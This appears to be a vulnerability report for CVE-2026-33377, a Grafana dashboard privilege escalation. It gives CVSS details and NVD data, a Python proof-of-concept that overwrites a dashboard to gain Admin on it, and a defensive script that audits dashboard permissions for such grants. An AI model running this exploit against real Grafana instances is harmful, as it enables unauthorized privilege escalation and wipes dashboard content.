Security Vulnerability Report
CVE-2026-33377 CVSS 7.1 HIGH

CVE-2026-33377

Published: 2026-05-13 20:16:20
Last Modified: 2026-05-14 19:16:32

Description

An Editor can overwrite a dashboard not owned by them to acquire admin on that specific dashboard. The user must have write access to the dashboard to escalate privilege.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available in the NVD record.

Grafana < (fixed version not listed here; refer to the official Grafana security advisory for the exact affected and patched version ranges)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import json
import requests

# CVE-2026-33377 PoC: Grafana dashboard-level privilege escalation
# Target: a Grafana instance
# Pre-condition: the attacker holds the Editor role and has write access to
# the target dashboard, but does not own it and does not hold Admin on it.

TARGET_URL = "http://localhost:3000"
API_KEY = "YOUR_EDITOR_API_KEY"          # API key / service account token with the Editor role
DASHBOARD_UID = "target_dashboard_uid"   # uid of the dashboard to overwrite

HEADERS = {
    "Authorization": f"Bearer {API_KEY}",
    "Content-Type": "application/json",
}

# Minimal dashboard model. Re-saving it with "overwrite": true replaces the
# dashboard that carries this uid; its existing panels are lost, so fetch and
# re-use the original "dashboard" object instead if the content must survive.
payload = {
    "dashboard": {
        "id": None,
        "uid": DASHBOARD_UID,
        "title": "Overwritten Dashboard",
        "tags": ["poc"],
        "timezone": "browser",
        "schemaVersion": 16,
        "version": 0,
    },
    "overwrite": True,
    "message": "Updating dashboard via PoC",
}

try:
    response = requests.post(
        f"{TARGET_URL}/api/dashboards/db",
        headers=HEADERS,
        data=json.dumps(payload),
        timeout=10,
    )
    if response.status_code != 200:
        print(f"[-] Overwrite failed: {response.status_code} - {response.text}")
        raise SystemExit(1)
    print("[+] Dashboard overwritten successfully.")

    # Verify the escalation: the dashboard's "meta" block reports the caller's
    # effective permissions on it. An Editor should never see canAdmin == true
    # on a dashboard they do not own.
    check = requests.get(
        f"{TARGET_URL}/api/dashboards/uid/{DASHBOARD_UID}",
        headers=HEADERS,
        timeout=10,
    )
    meta = check.json().get("meta", {})
    if meta.get("canAdmin"):
        print("[+] Caller now has Admin on this dashboard (meta.canAdmin = true).")
    else:
        print("[-] No escalation observed (meta.canAdmin is false or absent).")
except requests.RequestException as e:
    print(f"Error: {e}")
```
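The escalation described above leaves a footprint an incident responder can look for: an explicit, non-inherited Admin grant on a specific dashboard for a user whose organisation role is only Editor or Viewer. The following audit is an added example, not code from the advisory or the Grafana project. It assumes the response shapes of Grafana's GET /api/org/users (userId, login, role) and GET /api/dashboards/uid/<uid>/permissions (userId, userLogin, permission, inherited, with 1 = View, 2 = Edit, 4 = Admin); the records embedded below are constructed for the example rather than captured from a real instance.

```python
"""Audit Grafana dashboard ACLs for dashboard-level admin grants held by
non-admin org users (the footprint of CVE-2026-33377 abuse).

Added example; the sample API responses below are constructed, not real.
"""
from typing import Dict, List

# Permission levels as Grafana returns them in the "permission" field.
PERM_VIEW, PERM_EDIT, PERM_ADMIN = 1, 2, 4

# Constructed sample in the shape of GET /api/org/users.
ORG_USERS: List[dict] = [
    {"userId": 1, "login": "admin", "role": "Admin"},
    {"userId": 7, "login": "alice", "role": "Editor"},
    {"userId": 9, "login": "bob", "role": "Viewer"},
]

# Constructed sample in the shape of GET /api/dashboards/uid/<uid>/permissions,
# keyed by dashboard uid. Role-based rows carry "role"; user grants carry
# "userId"; "inherited" marks rows that come from the parent folder.
DASHBOARD_ACLS: Dict[str, List[dict]] = {
    "ops-overview": [
        {"role": "Viewer", "permission": PERM_VIEW, "permissionName": "View", "inherited": False},
        {"role": "Editor", "permission": PERM_EDIT, "permissionName": "Edit", "inherited": False},
        # alice is only an Editor in the org, yet holds Admin on this dashboard.
        {"userId": 7, "userLogin": "alice", "permission": PERM_ADMIN, "permissionName": "Admin", "inherited": False},
    ],
    "billing": [
        {"role": "Viewer", "permission": PERM_VIEW, "permissionName": "View", "inherited": True},
        # An org Admin holding dashboard Admin is expected and not a finding.
        {"userId": 1, "userLogin": "admin", "permission": PERM_ADMIN, "permissionName": "Admin", "inherited": False},
    ],
}


def org_roles(users: List[dict]) -> Dict[int, str]:
    """Map userId -> org role ("Admin", "Editor", "Viewer")."""
    return {u["userId"]: u["role"] for u in users}


def find_escalated_admins(org_users: List[dict], dashboard_acls: Dict[str, List[dict]]) -> List[dict]:
    """Return explicit dashboard Admin grants held by users who are not org Admins.

    Team- and role-based rows are skipped (they are not per-user grants), as are
    inherited rows (they were set on the folder, not on this dashboard). A userId
    missing from the org user list is reported with org_role "unknown" so that a
    deleted or external account still surfaces.
    """
    roles = org_roles(org_users)
    findings = []
    for uid, acl in dashboard_acls.items():
        for entry in acl:
            user_id = entry.get("userId")
            if user_id is None:
                continue
            if entry.get("inherited"):
                continue
            if entry.get("permission") != PERM_ADMIN:
                continue
            org_role = roles.get(user_id, "unknown")
            if org_role == "Admin":
                continue
            findings.append({
                "dashboard_uid": uid,
                "user_id": user_id,
                "user_login": entry.get("userLogin"),
                "org_role": org_role,
            })
    return findings


if __name__ == "__main__":
    for f in find_escalated_admins(ORG_USERS, DASHBOARD_ACLS):
        print(f"[!] dashboard {f['dashboard_uid']}: {f['user_login']} (org role {f['org_role']}) holds Admin")
```

To run this against a live instance, replace the two constructed samples with the JSON returned by the corresponding endpoints (an org Admin token is needed to read other users' roles and every dashboard's ACL) and review each finding against the dashboard's version history to see who saved the version that introduced the grant.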

References

https://grafana.com/security/security-advisories/cve-2026-33377 (Grafana security advisory; listed as the reference in the NVD record below)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-33377",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T20:16:20.470",
    "lastModified": "2026-05-14T19:16:32.217",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An Editor can overwrite a dashboard not owned by them to acquire admin on that specific dashboard. The user must have write access to the dashboard to escalate privilege."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "HIGH",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-284"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://grafana.com/security/security-advisories/cve-2026-33377",
        "source": "[email protected]"
      }
    ]
  }
}
```